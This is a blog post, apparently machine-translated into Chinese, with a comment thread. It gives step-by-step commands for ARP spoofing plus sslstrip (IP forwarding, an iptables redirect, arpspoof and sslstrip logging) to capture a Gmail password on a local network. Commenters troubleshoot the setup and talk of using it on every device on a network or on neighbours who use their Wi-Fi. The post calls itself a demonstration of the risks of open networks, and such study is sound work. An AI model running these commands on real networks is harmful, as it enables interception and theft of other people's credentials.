您好Blogger。
今天,我只是一小部分样本,说明连接到我们许多人喜欢的任何不安全网络可能有多危险。
今天,我将通过Sslstrip使用ArpSpoofing来获取Gmail密码。 为了更好地控制环境,我创建了一个名为“testarp@gmail.com“。
而且由于我不太喜欢序言,所以让我们开始做生意。
环境
对于此测试,我们具有以下内容:
1.攻击者: 具有Debian Wheezy的是我的台式机或台式计算机。 您可以从存储库中安装 sslstrip y 嗅探 拥有 伪造
2.受害人: 受害者是一个Android平板电脑,它只想通过浏览器查看他的邮件。
3.媒介: 中间是我的 思科DPC2425路由器
地址。
攻击者地址: 172.26.0.2
路由器地址:172.26.0.1
受害者的地址: 172.26.0.8
攻击:
对于此攻击,我们要做的第一件事是激活转发,以便我们的计算机可以将信息转发给受害者,而无需他们意识到。 (否则将拒绝服务攻击)
为此,我们将使用:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
现在如果我们执行 tail -f desdelinux 我们直接看到实时信息
那么,我们如何得到想要的呢?
首先让我们在平板电脑上输入我们的邮件。 登录时,我们看到控制台上出现了成千上万的东西。
现在已经完成了,让我们打开我们的文件“desdelinux” 与纳米
nano desdelinux
使用Control + W,我们搜索称为SECURE POST的内容。
我们将看到类似这样的内容。
受害者的电子邮件和密码是那条看不见的大字句。
因此,我们向右行驶,直到最终看到隧道尽头的灯。
在另一个场合,我们将看到我们如何才能稍微保护自己免受这些攻击。
问候
我借此机会说,发布该帖子时,命令不正确。
末尾的iptables命令缺少另一行上的8080。 然后arpspoof命令都在同一行上。 每个命令在不同的行上。
希望编辑者可以看到并修复它。
问候。
我已经做了您提到的更正,可以吗?
如果要在首选条目中插入代码,请使用HTML视图,并在将文章发送到待处理之前验证文章是否正确。 谢谢。
知道我们这些没有知识的人是如此脆弱,真是令人不寒而栗。 即使我对这门学科了解甚少,也可以得到很好的信息,我也意识到了它的重要性。 谢谢!
问候
但这仅在攻击者和受害者位于同一网络上时才有效。 无论如何,在我看来,如果(在同一网络上)使用HTTPS进行连接不会发生这种情况,因为在离开您的计算机之前已对数据进行了加密。 如果您通过HTTP(不带S)进行连接,我认为即使查看网络电缆,您也会看到按键。
这不是真的。 我正在破解gmail密码,如果您发现gmail使用https。 所以? 关键是,尽管https是安全的,但它取决于http。 所以它不是那么安全。
不要对HTTP承认太多,以至于S不适合超人使用,而是指“安全”使用
它可以在有或没有https的情况下使用,我已经在更专业的linux发行版中进行了尝试,并且没有问题
您可以精确地使用它为那些窃取您的Wi-Fi的人教课。 😀
这或多或少就像他们很久以前在Chema Alonso的博客上所说的那样:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia,它的功能非常棒!/然后,当我去检查银行帐户时,每次我使用VPN时,他们都会告诉我偏执狂……)。 顺便说一句,您必须看到评论中的人持愤世嫉俗的态度……如果最终是在偷窃……
现在,我们需要学习有关如何创建和提供自己的VPN服务的教程。
您链接的故事非常有趣,甚至还值得一本新书,这使我想起了我使用邻居的互联网时的经历,尽管我说我知道这个话题,但我认为我永远也看不到幸运的是,对我而言,他们只将密码更改为WPA2,这就是我与ISP的故事开始的地方哈哈
这就是标题中提到Sslstrip的原因。
只要攻击者在中间,它就可以工作
你在棱镜工作什么波浪? -.-
没有。
您还在等什么发送XD请求
问候
好帖子
有趣的是,我稍后再做一个教育测试。也许我什至可以删除WiFi的密码,然后玩一会儿😛
您是否有机会通过类似的操作将不同的页面发送到目标请求的页面? 例如,他们想打开Facebook,而我将他们重定向到Google? 😛
是。 但这是完全不同的一卷。
也许我以后再发布。
很好的帖子,这些话题很有教育意义,现在我们需要能够抵御这种攻击,因为有些人(例如我)连接到公共网络(例如大学),避免这种攻击将很有帮助。
的问候!
这对我没用🙁
除了通过服务器证书(一旦您的计算机上有证书,浏览器负责加密)通过服务器证书对https连接进行加密(使用iptables)重定向了端口80(http)而不是443以外,我在这里有些失败这是https
我也这么认为。 关键是,尽管https是“安全的”,但不幸的是它依赖于http。 因此,sslstrip利用了这一点,它使浏览器认为它使用的是https凭据,但没有使用。
天哪! 但浏览器应该会看到类似“此证书来自可疑网站或类似内容的警告”之类的警告……我绝对必须对XD进行测试
不,绝对没有任何结果。
终于对我有用
我使用密码连接到WEP网络,无论如何它直接向我显示了密码。
一个问题。 您是否可以对网络中连接的所有计算机执行相同的步骤,而不要让一个受害者受害?
是的你可以。 但是我还没有做实验。 自己尝试,并告诉我们您的状况。
我唯一得到的是受害者的机器脱机,但是sslstrip没有显示任何信息:/
您需要暂时禁用防火墙。 或至少启用传入连接。
探针,我只能看到Facebook页面的用户名和密码,在gmail中,我在日志中没有找到任何结果,我也只需要一行arpspoof«arpspoof -i -t«。 另一方面,受害机器无法打开某些页面。 我将继续调查,这很有趣。 对于使用Manjaro的用户而言,要安装的软件包对dsniff(这里是arpspoff),twisted和python2-pyopenssl有所帮助。 可以从这里下载Sslstrip: http://www.thoughtcrime.org/software/sslstrip/
运行它$ python2 sslstrip.py
问候。
它没有出来,但是arpspoof行是:#arpspoof -i int -t ip-victim ip-router
看我完全按照你的意思说:
echo“ 1”> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
问题是受害者是我在房间里的另一台电脑,我无法连接到必须重启路由器的位置,我该怎么办?
我正在使用虚拟机的另一件事是,当我执行iwconfig命令时,不会显示wlan0,也不会在执行ifconfig时显示,但是如果我的虚拟机上有Internet,则带有eth0接口。